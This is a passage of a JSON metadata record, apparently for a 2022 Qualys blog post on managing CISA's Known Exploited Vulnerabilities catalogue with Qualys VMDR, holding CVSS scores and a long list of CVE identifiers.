Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}